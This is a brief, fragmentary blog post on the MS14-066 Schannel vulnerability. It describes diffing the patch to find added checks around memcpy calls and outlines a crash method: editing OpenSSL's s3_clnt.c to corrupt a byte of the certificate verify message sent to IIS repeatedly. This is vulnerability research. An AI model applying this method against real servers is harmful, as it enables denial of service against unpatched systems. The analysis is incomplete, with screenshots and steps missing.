The Schannel vulnerability MS14-066 details has the information

MS14-066 was patched in November patch Tuesday (Nov 11).  and here is the details:

Unfortunately for those machines that do not patch regularly, the Microsoft patch allows the reverse engineer to figure out what was patched and then create a hack/Proof of Concept – POC)



We can now see that the added logic controls a path to a memcpy (actually two memcpys — they wouldn’t both fit in the screenshot).  This is an indication that we are looking in the right place. – See more at:

that starts the POC

…..  more analysis ….


final result:

So all we really need to do is edit s3_clnt.c to randomly change one byte in ‘p’ to a random value before sending our certificate verify message back to IIS over and over again and wait until something cool happens. (i.e. crashingmemcpy)


Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.